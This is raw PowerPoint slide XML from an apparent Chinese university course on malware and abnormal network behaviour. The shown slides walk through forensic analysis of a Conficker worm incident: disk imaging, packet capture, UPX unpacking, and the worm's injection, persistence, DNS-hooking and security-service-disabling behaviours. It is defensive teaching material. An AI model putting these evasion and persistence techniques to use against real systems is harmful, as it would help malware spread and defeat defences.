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0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28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283" r:id="rId60"/>
    <p:sldId id="338" r:id="rId61"/>
    <p:sldId id="339" r:id="rId62"/>
    <p:sldId id="340" r:id="rId63"/>
    <p:sldId id="341" r:id="rId64"/>
    <p:sldId id="343" r:id="rId65"/>
    <p:sldId id="342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259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E4332-88E9-4D47-B08B-558D546A7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5E1843-8633-40C9-8083-65B413C45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CA870-0AC8-4B6B-B244-57E1D7A5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6571FD-3440-4DB1-BA98-B8F3F8CA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9C745-DEEB-49C5-88C4-105B327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18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23646-CA19-4A4B-931B-68A5A00D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FD198F-3132-4FCE-A7E2-3BF8D62EE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BD41C-F4DA-4AC5-A87F-267133A0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4C9B5-5824-47A1-8336-ACFC9871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16CFF-9A29-4C05-A355-EB31D954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DD3BCE-139D-4650-8BCE-90226CAA7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05921E-841D-4148-BFC7-34A34E866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E1EAD-920B-4740-9CA9-1A37E8FB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0CECD-A167-4725-96B2-5B383F6C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E6565-948B-4723-8667-790294F9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66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32" y="5156200"/>
            <a:ext cx="8179003" cy="1701800"/>
            <a:chOff x="21924" y="3867150"/>
            <a:chExt cx="6134252" cy="1276350"/>
          </a:xfrm>
        </p:grpSpPr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4" y="3867150"/>
              <a:ext cx="6134252" cy="12763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 descr="F:\百度云\logo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4" y="4125054"/>
              <a:ext cx="1410747" cy="299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5" descr="F:\百度云\logo.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D281AE1F-8688-47A5-94F1-E2C490F03A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0517" y="357522"/>
            <a:ext cx="2258216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98B5197-73FD-42E0-8173-02A31EF254E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9478733" y="312589"/>
            <a:ext cx="2377907" cy="619183"/>
            <a:chOff x="7109050" y="234441"/>
            <a:chExt cx="1783430" cy="464387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41"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7109050" y="234441"/>
              <a:ext cx="802431" cy="46438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28B04A-B5D3-4EBA-858F-4F9BD52F94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8"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7824894" y="257588"/>
              <a:ext cx="1067586" cy="37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61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34" y="164637"/>
            <a:ext cx="1069908" cy="99774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138377"/>
            <a:ext cx="8176684" cy="170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143339" y="5138376"/>
            <a:ext cx="8176684" cy="171962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7988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7473-C9D1-4129-8997-8A60E7D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E5061-94EC-4C0D-A9EC-CA7F40CF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4F2AC-8939-430B-BF94-F75F9144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0D43E-29E6-4547-A52A-E54BD9E0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8D714-E693-4CE8-A774-C8A75393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3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D029C-1FD9-4C69-A60B-3E4A360B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D17865-F300-4B17-AA15-7C0CF282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5B2EF-5659-4F47-8B9C-A0CD2C14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63D51F-714C-41D0-92D4-940DAF24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430D7-DFDD-4858-A69C-CC552B46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4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959BC-1505-423A-A761-F55AAE2B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EEB2A-03E1-4874-8228-2B439352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AFF19-D623-4BB6-88C0-9B0F9BB65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371894-EE4C-491C-9AC4-6B128423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F7143-0711-48E6-8AA0-69FA8F80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031A7-3D82-4C6F-A269-A24101F4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4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EC030-1485-44B8-90B5-A6E8534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792C3E-C848-4CED-A56F-BE743B29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6CA936-2704-41AA-9C08-5E0DD5DAB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FE7B5C-619D-40BF-90D3-B8A3ACE0E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E8B02C-D452-4245-A83F-62CD4205E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D068EB-C07D-41AD-BF99-58506406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EC7BDD-B6EA-476F-BAD1-7517092C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EE87E3-2C2C-4430-BD68-BEAA0295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0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E115E-5C6D-4A0A-9AB9-E72A6199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6111F0-5724-4806-A7EF-FEC9F5D7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E08C80-A929-4E3C-87BF-2ACED34B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8735A1-5176-4E65-9996-D6571632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1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91483B-69F7-4F7B-841D-DBA20708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25DA16-C4A7-4E9C-991D-6E259ED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A5A675-7BAB-41D8-B164-6798B54D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2A562-C275-4CA8-B11B-3D9B8E16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17AC1-A800-429E-8DF9-CA6C0638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254422-A995-4273-AC29-43448C2C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8DB51-FB5E-45A7-AAD4-062B6955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FADC0-E72A-49D8-93DA-DCBBEECA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4B037-74FE-4A0E-94C1-0D9B804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0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74147-B79A-4A0B-81FE-DD1E13C5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05439D-A7A4-4F9E-BF8C-2680C2FEE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5A7F96-5AFC-4291-B433-84FB03D4D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CBFBA5-9193-4804-AAD4-FFC0C37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D282A7-7811-41B4-A989-5852B1EA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50D98E-968D-4D43-B117-C4E74F89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5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E831EB-7726-44D6-86E9-B1EFDA8D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5FBBBA-D96F-4414-A61C-D0B60C52F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21C27-7B64-4D03-B726-A94E0B310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535A1-C571-4E26-992C-494DA1D6E93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E728C-260A-4AA7-8538-50BF3FFF9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09A84-78FE-49B9-9CCE-FB7EBD655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39D05-AA15-4E1C-944E-1F51A22B6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49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lphalab1-wordpress.stor.sinaapp.com/uploads/2015/06/%E5%9B%BE%E7%89%873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alphalab1-wordpress.stor.sinaapp.com/uploads/2015/06/%E5%9B%BE%E7%89%874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downloads/details.aspx?display&amp;FamilyID=f26d395d-2459-4e40-8c92-3de1c52c390d" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/downloads/details.aspx?display&amp;FamilyID=0d5f9b6e-9265-44b9-a376-2067b73d6a03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?kbid=891716" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/downloads/details.aspx?display&amp;FamilyID=ad724ae0-e72d-4f54-9ab3-75b8eb14835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84840.com/sd/index.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/891716" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.microsoft.com/kb/890830(Windows2000/XP/2003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08.37.132/translate_c?hl=zh-CN&amp;sl=en&amp;u=http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-011316-0247-99&amp;prev=/search?q=http://www.symantec.com/security_response/writeup.jsp?docid%3D2008-112203-2408-99%26tabid%3D3&amp;hl=zh-CN&amp;newwindow=1&amp;sa=G&amp;usg=ALkJrhjTHXuK4whe6PJIlZERFSiV7lKBJw" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.microsoft.com/taiwan/security/articles/msrt0114.mspx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>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623393" y="2520115"/>
            <a:ext cx="11125548" cy="104450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733" b="1" dirty="0"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病毒与异常网络行为分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3733" b="1" dirty="0"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0D9E52-70CA-480C-9BE5-111E8D70BCD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17816" y="1316766"/>
            <a:ext cx="121920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电子科技大学 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4267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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4267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网络空间安全研究中心（暨学院）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4267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三、事故环境取证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如图所示，弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>"Select source partition(s) from Basic drive:1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对话框。选择备份的分区，下步将进行备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统的操作。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35FF07-E5E9-4B66-8F27-15A386F42F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70" y="1007833"/>
            <a:ext cx="7250793" cy="579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76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三、事故环境取证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弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>"File name to copy image to "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对话框，如图所示。设置镜像文件存放的路径、输入镜像文件名，点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>"Save"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>按钮。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9E0E6-D67C-4665-A26A-D94D849A76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17" y="886599"/>
            <a:ext cx="7120164" cy="5636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0DCB79-C83B-4BBB-BD7B-4D437C133CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466164" y="476809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生成文件完成备份。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241309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四、恶意样本提取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910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在通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>盘进行镜像文件拷贝时，发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>盘中出现了异常文件。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6BACC9-3D97-4949-9AE0-C9C2CAC528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806046"/>
            <a:ext cx="11651499" cy="4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627C54-98CC-475C-A906-266AA5B1A04D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947571" y="2432258"/>
            <a:ext cx="5698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将文件上传至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>virustotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行在线病毒检测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4041A6-F401-43FB-91D7-4B7DB1C467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7" y="2887882"/>
            <a:ext cx="8409856" cy="38549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A76489E-E7FD-4E94-8FCB-F6FB04CC59B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6957486" y="5743949"/>
            <a:ext cx="4603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55600" algn="just" latinLnBrk="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0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初步判断病毒可能为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="Times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1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四、恶意样本提取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2839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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>抓包分析，流量中通过访问内网主机下载一个恶意图片文件，实际为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>恶意文件。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E136BC-A8C6-4449-A824-47900FC129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4" y="742260"/>
            <a:ext cx="7372091" cy="5862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72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四、恶意样本提取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1081607" y="1167360"/>
            <a:ext cx="870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SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对象列表中发现通过管道传递的文件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4B05D0-0522-4BA0-B56A-A300BBC3FC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1" y="2015769"/>
            <a:ext cx="9708121" cy="18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DC849E-DD51-4B7B-9693-0710EBDE795A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081607" y="4596046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通过对比发现，获取到的多个文件为同一恶意样本文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324409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http://alphalab1-wordpress.stor.sinaapp.com/uploads/2015/06/%E5%9B%BE%E7%89%871.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF490F39-B449-4818-9810-C40ABE85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48" y="78361"/>
            <a:ext cx="8963351" cy="6870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20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3893CD-9A71-4220-B6F1-97C832B3FAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163215" y="1060063"/>
            <a:ext cx="9507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最开始通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>VT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>发现最外层是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>upx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>壳，通过自动脱壳机可以直接脱，也可以手动通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>定律去脱。找到如下图即为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UPX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>第一层。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27B9D7-3BB5-4103-B0F0-D68B72763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15" y="2016981"/>
            <a:ext cx="9507967" cy="6521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1207503" y="3013501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第二层申请堆空间，解码并且修改堆内存属性，最后跳入执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="图片3">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFE54CB-E8D1-4C99-A995-79AF2C0E17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469" y="3475166"/>
            <a:ext cx="8737024" cy="161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79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3893CD-9A71-4220-B6F1-97C832B3FAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163215" y="1060063"/>
            <a:ext cx="9507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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>VirtualProtect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>断点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1319470" y="3518334"/>
            <a:ext cx="9016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对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>009B1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>内存位置下内存访问断点，就可以到达第三层</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>第三层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UPX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>壳，进入最终恶意代码位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="图片4">
            <a:hlinkClick r:id="rId2"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54509EFA-17BB-40B5-8DA1-182B27E723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99" y="1603283"/>
            <a:ext cx="9247001" cy="141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å¾ç5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EBA6B17-C691-427B-81A6-DF27D1F792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4" y="4854164"/>
            <a:ext cx="9759727" cy="4821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655A34-3AE4-4777-AEC9-E19824449E12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21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3893CD-9A71-4220-B6F1-97C832B3FAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163215" y="1060063"/>
            <a:ext cx="9507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创建互斥量，避免重复感染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1207503" y="4945917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判断是以哪种方式执行的恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>dll(svchost.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>rundll32.exe)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="图片6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51D8E04-39F1-4C04-A34E-1A56082E73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15" y="1950099"/>
            <a:ext cx="9571425" cy="22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E1C8C6-B092-4A34-A410-D93C46CF77AB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16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3893CD-9A71-4220-B6F1-97C832B3FAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207503" y="849365"/>
            <a:ext cx="9507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1.rundll32.exe xxx/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>xxx.dll,yyy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运行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>svchost.exe -k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>netsvcs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进程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1251791" y="4651511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比较最后的参数，决定是否修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>不显示隐藏文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注册表项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="图片7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD3E278B-5964-41CC-ACC3-E6CAB54E7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91" y="1701385"/>
            <a:ext cx="8278586" cy="291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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38919E9F-D0D3-44E6-BA2A-F2810D5588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03" y="5113176"/>
            <a:ext cx="8278132" cy="13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A5B222-B37E-4EC0-8DA3-9F4FA29D832A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85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050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165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TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="1858924"/>
            <a:ext cx="7200800" cy="204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</a:rPr>
              <a:t>工业环境中飞客蠕虫病毒事故分析与防范</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/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Office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恶意文件分析与防范</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="26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WannaCry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中关于</a:t>
            </a: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MS17-010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漏洞利用分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="240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333" spc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教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="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78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3893CD-9A71-4220-B6F1-97C832B3FAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061589" y="1440902"/>
            <a:ext cx="246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2.svchost.exe -k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>netsvcs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>下运行的主线程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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8519885" y="4022859"/>
            <a:ext cx="34091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Hook DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>相关函数，防止受感染机器访问安全相关网站，使得杀毒软件无法升级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(DnsQuery_A,DnsQuery_UTF8,DnsQuery_W,Query_Main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="图片9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C98548-7E81-4834-A44D-C9B73209DD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41" y="181540"/>
            <a:ext cx="7896506" cy="371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图片10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE8281F-D7E6-4AA2-B7FE-671BB3B554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4022859"/>
            <a:ext cx="8323295" cy="26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9A4AF9-847B-4238-98BB-61657DD258D0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2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675421" y="895582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黑名单中网址关键字</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="图片11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51CF1BF-62A5-4441-915D-79EC628BB3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73" y="361768"/>
            <a:ext cx="6941509" cy="641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45419F-E752-4D9D-8E12-7023B3851C7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79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675421" y="895582"/>
            <a:ext cx="9016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主线程中：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>复制自身的时候会修改文件属性，让其不能轻易被删除，隐藏等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="图片12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFD7E40-9532-4219-80E9-471652A440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53" y="1879901"/>
            <a:ext cx="7917504" cy="26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片13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF921B44-B2E9-49F8-B603-DC04E411D2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51" y="4932035"/>
            <a:ext cx="7917503" cy="15626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D231D9-AB11-4291-AAEA-0BD541194548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11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675421" y="895582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复制的同时写入注册表，开机自动启动</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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C45B3A-58EB-445A-896E-6F7E2B8C4E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998637" y="389193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上面写入失败会写入下面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="图片14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A649094D-7885-4DF7-8A8D-E9312AC4E7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1" y="1934490"/>
            <a:ext cx="11012779" cy="123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图片15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC75D2F5-9F8C-47F7-B7EB-8CD68508AE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1" y="4791390"/>
            <a:ext cx="10862893" cy="79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FC012A-068D-4DB1-8AA8-B625272CD799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13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694083" y="1940610"/>
            <a:ext cx="9016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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>关闭系统更新等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>安全相关服务</a:t>
